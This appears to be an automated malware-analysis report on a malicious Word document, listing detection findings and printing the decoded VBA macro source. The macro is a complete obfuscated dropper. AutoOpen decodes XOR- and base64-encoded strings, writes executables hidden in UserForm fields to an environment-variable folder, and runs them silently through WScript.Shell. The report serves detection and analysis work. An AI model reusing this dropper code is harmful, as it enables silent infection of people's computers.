MALICIOUS
398
Risk Score
Heuristics 13
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPERThe VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = CreateObject(xibasbd) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
GetstoragePath = Environ(sbcba) -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes foundDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytesDisassembly hidden — these bytes score as data, not coherent x86 code (5/10 branch targets land on an instruction boundary (50% coherence)).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ocsp.digicert.com0A In document text (OLE body)
- http://ocsp.digicert.com0\In document text (OLE body)
- http://s.symcd.com06In document text (OLE body)
- http://ts-ocsp.ws.symantec.com0In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.microsoft.com/SMI/2016/WindowsSettingsIn document text (OLE body)
- http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0CIn document text (OLE body)
- http://crl3.digicert.com/DigiCertTrustedRootG4.crl0In document text (OLE body)
- http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S�Q�O�Mhttp://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0In document text (OLE body)
- http://www.digicert.com/CPS0��In document text (OLE body)
- http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0In document text (OLE body)
- https://calibre-ebook.comIn document text (OLE body)
- https://d.symcb.com/cps0%In document text (OLE body)
- https://d.symcb.com/rpa0In document text (OLE body)
- http://s.symcb.com/universal-root.crl0In document text (OLE body)
- https://d.symcb.com/rpa0@In document text (OLE body)
- http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0In document text (OLE body)
- http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11179 bytes |
SHA-256: e21238ca4bf1b1f10c74f57a4b58f3ae46269d479c61065a8ea0a0c57455dc84 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public keyHex As String
Sub xvqkblk(cvacjgzddhi As String)
Dim wsh As Object
xibasbd = livbwfa("FDI" + _
"BFA" + _
"sZF" + _
"V" + _
"0a" + _
"HhA" + _
"VL" + _
"w=" + _
"=")
Set wsh = CreateObject(xibasbd)
wsh.Run GetQuoteStart() & GetC(cvacjgzddhi) & GetQuoteStart(), GetWindowStyle(), False
End Sub
Function GetQuoteStart() As String
GetQuoteStart = Chr(34)
End Function
Function GetC(cvacjgzddhi As String) As String
GetC = cvacjgzddhi
End Function
Function GetWindowStyle() As Integer
GetWindowStyle = CalculateStyleValue()
End Function
Function CalculateStyleValue() As Integer
CalculateStyleValue = SubtractValues(10, 5)
End Function
Function SubtractValues(a As Integer, b As Integer) As Integer
SubtractValues = a - b
End Function
Function fileExist(filePath)
Dim fso
asbabc = livbwfa("EAI" + _
"QD" + _
"xIdC" + _
"B" + _
"0" + _
"OW" + _
"DMQL" + _
"w" + _
"Q" + _
"xH" + _
"xEd" + _
"BB4m" + _
"FB" + _
"8" + _
"c" + _
"IBU=")
Set fso = CreateObject(asbabc)
If fso.fileExists(filePath) Then
fileExist = True
Else
fileExist = False
End If
Set fso = Nothing
End Function
Private Function dfsadg(s As String) As String
On Error Resume Next
dfsadg = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function
Private Sub iu8nvsd(ByRef m() As Integer)
Dim i As Integer
For i = 0 To 128
m(i) = -1
Next i
For i = 65 To 90: m(i) = (i - 65) Xor 0: Next i
For i = 97 To 122: m(i) = (i - 71) Xor 0: Next i
For i = 48 To 57: m(i) = (i + 4) Xor 0: Next i
m(43) = 62 Xor 0
m(47) = 63 Xor 0
m(61) = 0 Xor 0
End Sub
Private Function miomfig(ByVal v1 As Long, ByVal v2 As Long, ByVal v3 As Long, ByVal v4 As Long) As Long
miomfig = v1 * CLng(262144) + v2 * CLng(4096) + v3 * CLng(64) + v4
End Function
Private Sub jsuidnguinsdg(ByVal combined As Long, ByRef outArr() As Byte, ByVal pos As Long)
outArr(pos) = CByte((combined And &HFF0000) \ &H10000)
outArr(pos + 1) = CByte((combined And &HFF00&) \ &H100&)
outArr(pos + 2) = CByte(combined And &HFF&)
End Sub
Public Function hbvaf(ByVal cleanData As String) As Byte()
Dim mapArr(128) As Integer
Dim chkLen As Long, padCount As Integer
Dim idx As Long, pos As Long, outLen As Long
Dim resBytes() As Byte
Dim c1 As Integer, c2 As Integer, c3 As Integer, c4 As Integer
Dim combined As Long
chkLen = Len(cleanData) And 3
If chkLen <> 0 Then
hbvaf = ""
Exit Function
End If
padCount = 0
If (Len(cleanData) >= 2) And (Right$(cleanData, 2) = "==") Then
padCount = 2
ElseIf (Len(cleanData) >= 1) And (Right$(cleanData, 1) = "=") Then
padCount = 1
End If
iu8nvsd mapArr
outLen = (Len(cleanData) \ 4) * 3
If outLen > 0 Then
ReDim resBytes(outLen - 1)
Else
hbvaf = ""
Exit Function
End If
pos = 0
For idx = 1 To Len(cleanData) Step 4
c1 = mapArr(Asc(Mid$(cleanData, idx, 1)))
If c1 = -1 Then c1 = 0
c2 = mapArr(Asc(Mid$(cleanData, idx + 1, 1)))
If c2 = -1 Then c2 = 0
c3 = mapArr(Asc(Mid$(cleanData, idx + 2, 1)))
If c3 = -1 Then c3 = 0
c4 = mapArr(Asc(Mid$(cleanData, idx + 3, 1)))
If c4 = -1 Then c4 = 0
combined = miomfig(c1, c2, c3, c4)
Call jsuidnguinsdg(combined, resBytes, pos)
pos = pos + 3
Next idx
If padCount > 0 Then
ReDim Preserve resBytes(UBound(resBytes) - padCount)
End If
hbvaf = resBytes
End Function
Function chstd(s As String) As Byte()
Dim raw As String
raw = dfsadg(s)
chstd = hbvaf(raw)
End Function
Private Function livbwfa(ByVal encodedStr As String, Optional ByVal code As Integer = 2) As Variant
Dim decodedBytes() As Byte
Dim keyBytes() As Byte
Dim resultBytes() As Byte
Dim i As Long
Dim keyLen As Long
Dim dataLen As Long
Dim hexByte As String
decodedBytes = chstd(encodedStr)
If UBound(decodedBytes) = -1 Then
livbwfa = ""
Exit Function
End If
dataLen = UBound(decodedBytes) + 1
keyLen = Len(keyHex) / 2
If keyLen <= 0 Then
livbwfa = ""
Exit Function
End If
ReDim keyBytes(0 To keyLen - 1)
For i = 0 To keyLen - 1
hexByte = Mid(keyHex, i * 2 + 1, 2)
If Len(hexByte) <> 2 Then
livbwfa = ""
Exit Function
End If
keyBytes(i) = CByte("&H" & hexByte)
Next i
ReDim resultBytes(0 To dataLen - 1)
For i = 0 To dataLen - 1
resultBytes(i) = decodedBytes(i) Xor keyBytes(i Mod keyLen)
Next i
If code = 1 Then
livbwfa = resultBytes
Else
livbwfa = StrConv(resultBytes, vbUnicode)
End If
End Function
Private Function kabsd(buf As Variant) As Byte()
Dim i As Long
Dim tmp() As Byte
If VarType(buf) <> vbArray + vbByte Then
kabsd = Split("")
Exit Function
End If
ReDim tmp(LBound(buf) To UBound(buf))
For i = LBound(buf) To UBound(buf)
tmp(i) = buf(i)
Next i
kabsd = tmp
End Function
Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
Dim fileNum As Integer
Dim i As Long
On Error GoTo ErrHandler
fileNum = FreeFile
Open FileName For Binary As #fileNum
For i = LBound(staticBuf) To UBound(staticBuf)
Put #fileNum, , staticBuf(i)
Next i
Close #fileNum
WBTD = True
Exit Function
ErrHandler:
WBTD = False
End Function
Function WrtBnfile(FileName As String, buf As Variant) As Boolean
Dim staticBuf() As Byte
staticBuf = kabsd(buf)
On Error Resume Next
If UBound(staticBuf) < LBound(staticBuf) Then
WrtBnfile = False
Exit Function
End If
On Error GoTo 0
WrtBnfile = WBTD(FileName, staticBuf)
End Function
Function vzexuqlaqfmxnd(path As String, conte As String)
hwminiArra = livbwfa(conte, 1)
WrtBnfile path, hwminiArra
End Function
Function GetstoragePath() As String
sbcba = livbwfa("FwQ" + _
"PF" + _
"g==")
GetstoragePath = Environ(sbcba)
Debug.Print GetstoragePath
End Function
Function BuildDP1(hfdsfasd As String) As String
asnca = livbwfa("Jg" + _
"M" + _
"NCQ" + _
"lEBB" + _
"cAAl" + _
"s" + _
"cOw" + _
"Q" + _
"=")
BuildDP1 = hfdsfasd & "\" & asnca
End Function
Function BuildDP2(hfdsfasd As String) As String
sdvv = livbwfa("ACA" + _
"O" + _
"D" + _
"wA" + _
"b" + _
"BF" + _
"4lNw" + _
"AXI" + _
"AkHF" + _
"Ew" + _
"N" + _
"DR8" + _
"=")
BuildDP2 = hfdsfasd & "\" & sdvv
End Function
Function BuildDP3(hfdsfasd As String) As String
ubv = livbwfa("J" + _
"gU" + _
"LE" + _
"lBH" + _
"CR" + _
"8Z")
BuildDP3 = hfdsfasd & "\" & ubv
End Function
Function GetFormContent() As String()
Dim result(2) As String
vnsadf = livbwfa("AA4" + _
"PCw" + _
"MH" + _
"BTEc" + _
"AgE" + _
"W" + _
"L" + _
"VA" + _
"=")
tyvdf = livbwfa("A" + _
"A" + _
"ASE" + _
"g" + _
"sGD" + _
"w" + _
"==")
result(0) = CallByName(UserForm1.Controls(vnsadf), tyvdf, VbGet)
result(1) = CallByName(UserForm2.Controls(vnsadf), tyvdf, VbGet)
result(2) = CallByName(UserForm3.Controls(vnsadf), tyvdf, VbGet)
GetFormContent = result
End Function
Sub ypoc(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
vzexuqlaqfmxnd destPath1, content(0)
vzexuqlaqfmxnd destPath2, content(1)
vzexuqlaqfmxnd destPath3, content(2)
End Sub
Sub checkrun(njivnbd As String)
xvqkblk (njivnbd)
End Sub
Sub gdsfa(ByRef f1 As String, ByRef f2 As String, ByRef f3 As String)
Dim baseDir As String
baseDir = GetstoragePath()
f1 = BuildDP1(baseDir)
f2 = BuildDP2(baseDir)
f3 = BuildDP3(baseDir)
Call MaterializeAssets(f1, f2, f3)
End Sub
Sub MaterializeAssets(inPath1 As String, inPath2 As String, inPath3 As String)
If Not fileExist(inPath1) Then
Dim byteData() As String
byteData = GetFormContent()
ypoc inPath1, inPath2, inPath3, byteData
Call asdfuib(inPath1)
End If
End Sub
Sub asdfuib(targetPath As String)
checkrun targetPath
End Sub
Function start()
Dim f1 As String, f2 As String, f3 As String
Call gdsfa(f1, f2, f3)
End Function
Function getkey()
Dim result As String
result = CallByName(UserForm4.Controls("C" + _
"om" + _
"ma" + _
"n" + _
"d" + _
"But" + _
"t" + _
"on1"), "Ca" + _
"pt" + _
"i" + _
"on", VbGet)
keyHex = result
start
End Function
Sub AutoOpen()
getkey
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F1ED3889-86B5-470F-9859-3C27AD0D1514}{7DE4DEB2-3FA3-431F-995F-2ED81D540BB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{99C5A5DC-90E1-4045-9160-28D8B470F311}{5385B164-4714-4B64-AADC-6C8D5F1BD1C3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{AA0A31B0-C9C0-462C-A5A9-94A9026DC0F7}{E09AC3CE-07D3-47F7-8EB6-C3BFDC4DE0E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{CE69E5C1-2A70-4CF3-968F-24B86ED6C986}{AB11C1FD-B92A-4FCF-89BC-2792D206DB1A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vba_embedded_payload.bin |
vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 96368 bytes |
SHA-256: 2459fafef92fba15db51222e6b94e9853b7eff3256a54be22736e41b587a1b1f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.